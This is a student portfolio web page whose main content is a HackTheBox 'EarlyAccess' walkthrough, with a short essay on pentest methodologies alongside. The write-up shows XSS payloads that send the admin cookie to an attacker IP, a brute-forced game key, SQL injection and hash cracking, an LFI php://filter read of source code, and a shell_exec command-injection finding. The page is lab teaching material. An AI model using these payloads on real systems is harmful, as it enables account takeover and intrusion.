          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
